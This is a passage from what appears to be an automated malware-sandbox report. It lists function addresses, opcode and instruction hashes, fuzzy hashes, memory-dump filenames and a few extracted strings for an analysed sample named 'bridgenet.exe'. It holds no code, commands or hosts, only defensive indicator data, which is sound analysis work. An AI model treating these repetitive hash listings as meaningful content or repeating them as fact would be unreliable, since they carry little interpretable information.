String ID:
API String ID:
Opcode ID: def34d4988afbae5159aab5ddc4a11a466536b840d876111f3ef26cb5fa3b44b
Instruction ID: 24eecf4e960aa7fad457c16a828848639702c037af173a8bd826400f90c81276
Opcode Fuzzy Hash: def34d4988afbae5159aab5ddc4a11a466536b840d876111f3ef26cb5fa3b44b
Instruction Fuzzy Hash: 43017C35A0D38A9FE702DB78C98419CBFB0FF56354F1541F6C055DB292EA386A89CB81

Function 00007FF887EA0C50 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baf95958f63a58f74ac5312ee01ea0a9408d35cc13cc2ebe40fd4747bcde6cf4
Instruction ID: 933b8610c43eb205d32f5e1b244ee9af15ba09bdcafe75421fb90edf70f1a64f
Opcode Fuzzy Hash: baf95958f63a58f74ac5312ee01ea0a9408d35cc13cc2ebe40fd4747bcde6cf4
Instruction Fuzzy Hash: A5017C3090C28A9FE702DB64C98419CBFB0FF56344F1441E6C054DB292EA386A44C781

Function 00007FF887EA3C40 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction ID: f0237659ebaf2d4b6a999c587908d91e6a7b29148de82412ca98755a3cc29983
Opcode Fuzzy Hash: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction Fuzzy Hash: D4F0C930A8891A8AFB64EA14C954BBCB3B2FB64751F1542B9C00ED7191DE3C6D86CA00

Function 00007FF888245349 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1817868969.00007FF888240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff888240000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd47dbd5d1782275926f61cbe45404fd552d32be756d8350b9318ad8f12cfe02
Instruction ID: 529ef864c7f61ae5f888922da1672fffa1084c911011af6537b7531e090c2f0b
Opcode Fuzzy Hash: cd47dbd5d1782275926f61cbe45404fd552d32be756d8350b9318ad8f12cfe02
Instruction Fuzzy Hash: 73F0E531B08F484FC719962D986C4B17BF1DF6A21234A03EFD006C72B3DD18AC848341

Function 00007FF887EA0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713bae70842f161488b17eda14f133d9137c3f49c87a43fc96d4e3aa3b5eaad9
Instruction ID: 32a7ccf5bc0458702da9e7d08d21b40a650a3383556af9a46ac924c34fae6851
Opcode Fuzzy Hash: 713bae70842f161488b17eda14f133d9137c3f49c87a43fc96d4e3aa3b5eaad9
Instruction Fuzzy Hash: FAE0613A55DA54CFC740DB78DCA50D4BF90FF5221874611FEC049C7562D251595DC740

Function 00007FF8882478C9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1817868969.00007FF888240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff888240000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d34b838f7b7858ee78928cb87c727d9ca5c3d6235294826c77e6485e7920f3
Instruction ID: 7ca1e94ab32e71ffd9822bf63426019795d4e7fd8e0235a3c5a5e425063de206
Opcode Fuzzy Hash: 06d34b838f7b7858ee78928cb87c727d9ca5c3d6235294826c77e6485e7920f3
Instruction Fuzzy Hash: 86E04830719B894FCB4DA629886D9607BF1EF6621178A52FBC005CB1A3DD19DCC5C741

Function 00007FF88824614A Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1817868969.00007FF888240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff888240000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1645590bfe28af6835c6ea00d789e69aec8edf0d431d67e717697826984b24f0
Instruction ID: 295ae6f14ce66aad9f0df9fd0d89986b0ca6efde6735f8c6065674547549395b
Opcode Fuzzy Hash: 1645590bfe28af6835c6ea00d789e69aec8edf0d431d67e717697826984b24f0
Instruction Fuzzy Hash: C2F0A030A88A05CBF7149A48C494BF83391FB563C0F600278D90A8B2D3DF2E7849C304

Function 00007FF888244629 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1817868969.00007FF888240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff888240000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0b0029ca3ff08190374221a55d455bc9a81928841979aea224af8452a1d97b2
Instruction ID: d0617605601208bea0dcfa9fcb625ac9f4d21ba6600e336eae96ad51cbdbd373
Opcode Fuzzy Hash: f0b0029ca3ff08190374221a55d455bc9a81928841979aea224af8452a1d97b2
Instruction Fuzzy Hash: 76E04F31A59BC44FCB0EA7288C699603BB1EF6B21174A40EBC049CB1B3D619DC88C701

Function 00007FF888248609 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1817868969.00007FF888240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff888240000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b1a2e678214e3c89392d7d034e4845a197b1e82a23251a59462e19aad151323
Instruction ID: 45ddf6c9ca1c1ca6e82a6375dc5b18942060462070557324ad86564fd9b9863f
Opcode Fuzzy Hash: 9b1a2e678214e3c89392d7d034e4845a197b1e82a23251a59462e19aad151323
Instruction Fuzzy Hash: 79E0BF31A5D7804FC70A97248C699643BB1EF6721178A41EAD045CB5B3D659DC49C741

Function 00007FF887EA6D4F Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386564d7a5ce44bf9b6c78c5377d2f8ba8a62bb13c0ab21574bf5c3319deb541
Instruction ID: b01951cff17cd68f7dd7bf7e2d49b1f99dbc5e3daf2707c4962f30eb6cce36aa
Opcode Fuzzy Hash: 386564d7a5ce44bf9b6c78c5377d2f8ba8a62bb13c0ab21574bf5c3319deb541
Instruction Fuzzy Hash: 1DE01A20E4C41647FB94A218C9407BDA370FBA8784F1440B8D94EE33C2DE3CAE44CB16

Function 00007FF887EA0CEE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76052e9d752c8258f6186f67d7a571e79ca8705db5d8e39cf9c1954a6e67b52f
Instruction ID: 499175808f33438055c91747cb24026204c5099db55287fa7b212907dd5ddf67
Opcode Fuzzy Hash: 76052e9d752c8258f6186f67d7a571e79ca8705db5d8e39cf9c1954a6e67b52f
Instruction Fuzzy Hash: 3FE05B34A4820ACBF700DB54C5845EDF771FB61765F108275C425873C9EE7C6684C780

Function 00007FF887EA6DA2 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction ID: d512e688503267abeed7aefdb4c1db07de5652a345515cdb16c597f799e10c20
Opcode Fuzzy Hash: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction Fuzzy Hash: 0AD05E10D4C0034BFB545214C1507B9A3B0AFA5788F1400B5D90D932D1DE2CAC01C605

Function 00007FF887EA06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction ID: c098f997cb935d08546210ef04d6614ec4bfa5ac6210d8457ad20468569dddaa
Opcode Fuzzy Hash: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction Fuzzy Hash: 80C04C05EDA55B01B455716E96460BDE7607BF5F98FD50172D51C404C1FC4D20D98156

Function 00007FF887EA5472 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 913ac726d7a82c12662e00f086b6123613e850cb78ace70a5d7d9b4f39110bee
Instruction ID: dbba82d5fe0d63cecb7673b5d2d37ad58d643affd62350696e3b6fb9931e46e3
Opcode Fuzzy Hash: 913ac726d7a82c12662e00f086b6123613e850cb78ace70a5d7d9b4f39110bee
Instruction Fuzzy Hash: DDC04C02F1881656F655625840252BF45629F95A44F954039E51DC63CACF1C5A1142C7

Function 00007FF887EA06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction ID: b68cc61221d88ba47b2ab17305b21a5a2f45d01220fce5ed5967212e3c8ab4d1
Opcode Fuzzy Hash: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction Fuzzy Hash: 7EB01200CE644F00A408317E0A4207DF1607B94648FC00170E40C40081E88D20E84243

Non-executed Functions

Function 00007FF887EA09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FF887EA0B46
!k9, xrefs: 00007FF887EA0B4E
#{9, xrefs: 00007FF887EA0B3E
c9, xrefs: 00007FF887EA0B56

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 651fb85edec2241e8e4f2d646c03ce2ff3bc321c37d5575cfa5b4b1e7fe45f73
Instruction ID: cfe2e473e4a29451584bdc96362b8c8a04133e7d4e25be0ee069568fbc22f805
Opcode Fuzzy Hash: 651fb85edec2241e8e4f2d646c03ce2ff3bc321c37d5575cfa5b4b1e7fe45f73
Instruction Fuzzy Hash: 7A418017A0857245F1513AFDF4112ED9B949FA13F9B8C8677E16C8A8C3EC3C648782E6

Analysis Process: bridgenet.exe.bin.exePID: 1876, Parent PID: 2728COMMON

Executed Functions

Function 00007FF887E90D48 Relevance: 6.5, Strings: 5, Instructions: 263COMMON

Download Yara Rule

Strings

"9B, xrefs: 00007FF887E90DD1
r6B, xrefs: 00007FF887E90EA7
r6B, xrefs: 00007FF887E90EC5
5[_H, xrefs: 00007FF887E90DF3
b4B, xrefs: 00007FF887E90F17

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: "9B$5[_H$b4B$r6B$r6B
API String ID: 0-1423679481
Opcode ID: fb53b3273fd2b44cdb2f8bd65de598e5ea8c224473c9f19f6a007f451986e2f6
Instruction ID: 61eceeda59fe793b651e5a7ed8c1f1c494f44386970369a7c647d53a59978253
Opcode Fuzzy Hash: fb53b3273fd2b44cdb2f8bd65de598e5ea8c224473c9f19f6a007f451986e2f6
Instruction Fuzzy Hash: 1891C275918A9A8FE789DB68C8653ADBFF1FB9A350F8000BAC009D73D6DE781815C741

Function 00007FF887E90E43 Relevance: 3.9, Strings: 3, Instructions: 171COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF887E90EA7
r6B, xrefs: 00007FF887E90EC5
b4B, xrefs: 00007FF887E90F17

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID: b4B$r6B$r6B
API String ID: 0-2866943093
Opcode ID: ae804af98cc9cc7fca6c92c19d68f2bbe7c187386b46e7378dd5387a9c6c966a
Instruction ID: c5f8b35f508ff51f6f37d7ce3a3abc66ccf4c63e188c2f5addb9d98e78ec7213
Opcode Fuzzy Hash: ae804af98cc9cc7fca6c92c19d68f2bbe7c187386b46e7378dd5387a9c6c966a
Instruction Fuzzy Hash: F951B07691899A8EE788DB58C4693AEBFE0FB9A350F80017EC00DD77D5CBB81815C700

Function 00007FF888234CE4 Relevance: 2.9, Strings: 2, Instructions: 434COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF888234D18
r6B, xrefs: 00007FF888234D30

Memory Dump Source

Source File: 0000001F.00000002.1895287963.00007FF888230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff888230000_bridgenet.jbxd

Similarity

API ID:
String ID: r6B$r6B
API String ID: 0-2860294223
Opcode ID: 9aaa9616dafdc54de29d50c4ecda02dabf1ab279509c3dd524a9e15f5cf169e7
Instruction ID: 692422797ade5315a48f73549453321db60f22555fa0f2e459348ca34d8cb4ee
Opcode Fuzzy Hash: 9aaa9616dafdc54de29d50c4ecda02dabf1ab279509c3dd524a9e15f5cf169e7
Instruction Fuzzy Hash: 6DD1A230E5895A4BE798EB2894A56F973E2FF9D750F4401B9D40EC32E2CF286C46C745

Function 00007FF8882380F9 Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF888238116

Memory Dump Source

Source File: 0000001F.00000002.1895287963.00007FF888230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff888230000_bridgenet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 81761cb2495d4dff9d3a037538a6de0801fe2d02daba0ce7df92ac894064518a
Instruction ID: 803bee93634cc4478c222c50e81aa37626e5d3f0333c01845118700e575a7c6f
Opcode Fuzzy Hash: 81761cb2495d4dff9d3a037538a6de0801fe2d02daba0ce7df92ac894064518a
Instruction Fuzzy Hash: 18F0E56195E3C54FCB16AA348869594BFA0EF63240B4901FFC095CF1E3EB1CC88ACB01

Function 00007FF888238339 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF888238356

Memory Dump Source

Source File: 0000001F.00000002.1895287963.00007FF888230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff888230000_bridgenet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 7a9d31b63f671d67f2fcef8ac9e24451ba80a5967fdf56752bf7a5ea53a90ba0
Instruction ID: 2388df5581807d9417885d7837b3b57b99c8340149d39c3b134161e0fdc27e85
Opcode Fuzzy Hash: 7a9d31b63f671d67f2fcef8ac9e24451ba80a5967fdf56752bf7a5ea53a90ba0
Instruction Fuzzy Hash: 07E0127194E3C04FC755AA3484A98543F60EE6B21078A40DEC045CF1B3D71D9845C701

Function 00007FF888237959 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF888237976

Memory Dump Source

Source File: 0000001F.00000002.1895287963.00007FF888230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff888230000_bridgenet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: b624f2230d707de0b68f9cd5b9de239a18c508176f4d0011553e67f6cbe2cfbc
Instruction ID: fddd14d9e12d1de83a242d7e02eb205813aba6c249bc5eb4e3a62664bd696e74
Opcode Fuzzy Hash: b624f2230d707de0b68f9cd5b9de239a18c508176f4d0011553e67f6cbe2cfbc
Instruction Fuzzy Hash: FDE01A6194E7C48FCB16EB7488B98447FA0AE6B260B8A41EEC045CF1B3E62D9849C701

Function 00007FF887E9116D Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aea9e29b53ed40c8e5353bc23429354cc0fca78f1f10a861d9ef29009163cc2f
Instruction ID: 47eb819bf4f506aa0506abb96254cbaed42a84f02306fddb1c2a555b75af06cc
Opcode Fuzzy Hash: aea9e29b53ed40c8e5353bc23429354cc0fca78f1f10a861d9ef29009163cc2f
Instruction Fuzzy Hash: F9A1AE31908A4E8FEB54EF68C855BF97BE1FF59350F14417AD44EC7292DA38A841CB81

Function 00007FF8882313E5 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1895287963.00007FF888230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff888230000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c71898c65d9aaef269f8be5266741405318c895c69eacc6689ec0506a57792dd
Instruction ID: 45cf1b665d98e80498fc196b947f4b2d1fe380675494bf9060f83f4e68ead52c
Opcode Fuzzy Hash: c71898c65d9aaef269f8be5266741405318c895c69eacc6689ec0506a57792dd
Instruction Fuzzy Hash: 2951E322D1E6874BE729D76448261E93BA0FF45290F0805BAE58DC71A3EF1C680AC396

Function 00007FF887E908D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de63727ae7f4c5b3530292611b260b06f8cfaed1f85390da8a8366642d978837
Instruction ID: caea87db3a2f8c7836bfcbc24477892e4a3acb7b9210db7d6c8935601215e3e0
Opcode Fuzzy Hash: de63727ae7f4c5b3530292611b260b06f8cfaed1f85390da8a8366642d978837
Instruction Fuzzy Hash: 36412522A5C5254AF244B7ECA0553FD7790EF997A5B4844BBD04DC71D3EE2CAC428285

Function 00007FF887E93B90 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 705c440575d03f5f445c40014914a3b3c13dcdd6fcc38d1036c9f419d4524a50
Instruction ID: 85d43e67efbe61807b371d3c4203872425fcd08e4f0a91b42c8b2284c8629a31
Opcode Fuzzy Hash: 705c440575d03f5f445c40014914a3b3c13dcdd6fcc38d1036c9f419d4524a50
Instruction Fuzzy Hash: B1311E32E4890A5BFBA4E668C8557BC72B2FF94B90F5501B5D01ED3292EE2CAD85C740

Function 00007FF887E90998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba49417d4f7c32455af4f8ef98642bb5bf733a2495da3d3f1f2766f7e4461afe
Instruction ID: 95172325ed77a1c9b1c84ea5c2fd8d9bff78efd6e1a88c513ecdc4dc05c200c2
Opcode Fuzzy Hash: ba49417d4f7c32455af4f8ef98642bb5bf733a2495da3d3f1f2766f7e4461afe
Instruction Fuzzy Hash: C8212921B689194FE788F7AC94597BEB2D2FF9D751B50007AE40EC32D2DD2C9C418285

Function 00007FF887E90C25 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9794e6b5bc5c1cdab54f7f9a24db0f8909251109291019ec104abb72ecfaf3d
Instruction ID: abcc518e58f1f0057ff19ccb924a3dfb42b4228beb5fe7e69a31aa578cd77beb
Opcode Fuzzy Hash: d9794e6b5bc5c1cdab54f7f9a24db0f8909251109291019ec104abb72ecfaf3d
Instruction Fuzzy Hash: DD21E737A0C65A8FE702ABA8D8412DC7B70EF81365F5485B3D0588B1C3D93C698AC791

Function 00007FF887E90C38 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53fd3b610b3d635b662d51d7e8c35282ad1f9daee48873030445b073b8aff49a
Instruction ID: b37fc96e869fe461ff271fbf2b0fc20e2011b0047f93ca8911fb153de8f3e392
Opcode Fuzzy Hash: 53fd3b610b3d635b662d51d7e8c35282ad1f9daee48873030445b073b8aff49a
Instruction Fuzzy Hash: 3811E536A0C64A8FE702DBB8C8402DC7BB0FF82754F5544B3C054DB282E9386A8AC780

Function 00007FF887E90C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 537d7133c16a50d4bf8823a3d15254f8511525a44344ee54205983f9d8ebb817
Instruction ID: f46fb68fa4d4f9d84da28613a9cf28daa2f096aaa8e5badbc34a5e845f98bc35
Opcode Fuzzy Hash: 537d7133c16a50d4bf8823a3d15254f8511525a44344ee54205983f9d8ebb817
Instruction Fuzzy Hash: 5F018036A0C68A9FE702DBA8C8502DC7BB0FF52754F5545B6C454DB292DA386A89C780

Function 00007FF887E9417E Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33d5ff421803b242733bafc88edef98211bc0af9bd83c9f4e37f810cfd0e1f2c
Instruction ID: f542df0f50b31f0e6e424fe93c7efec8bc4dd0d59fb9c71686414983739011a8
Opcode Fuzzy Hash: 33d5ff421803b242733bafc88edef98211bc0af9bd83c9f4e37f810cfd0e1f2c
Instruction Fuzzy Hash: CB012931A58A19CFDB88EB44C494FBE73B1FB69350F1041A9D40ED32A1CE38AD44CB85

Function 00007FF887E90C48 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 768584086eb135aa68f868dd5a8f93170894838f5243f7af4a1859a742904a28
Instruction ID: 366abafc1212ebe60f548dcfcae0721bc1104d5c4df70c5df2ac2e5e246ebcf5
Opcode Fuzzy Hash: 768584086eb135aa68f868dd5a8f93170894838f5243f7af4a1859a742904a28
Instruction Fuzzy Hash: CE01713290D38A9FE742DBB8C84029CBFB0FF42754F5541F6C054DB296EA386A85C781

Function 00007FF887E90C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29063afadd86106eb5f92f35593e4a4799b8dbe6e9333c54590ad8b1855c9573
Instruction ID: 65fdfe66e92f705e15f3db4b13cd0edb82ba122d41f078798e691bb862c5d890
Opcode Fuzzy Hash: 29063afadd86106eb5f92f35593e4a4799b8dbe6e9333c54590ad8b1855c9573
Instruction Fuzzy Hash: B6018F3190C38A9FE742DBA8C84029CBFB0FF02354F5441E6C054DB286EA386A84C781

Function 00007FF887E93C40 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction ID: 7de7c9aa8f533a3816ead4c119d0a463403ed74ecad61757263a838b80003d7f
Opcode Fuzzy Hash: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction Fuzzy Hash: 86F0C932A8981A8AFB64EA64C854BBC72B1FB54751F5402B9C00ED7191DF3C6D86CA00

Function 00007FF887E90B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1870077257.00007FF887E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff887e90000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
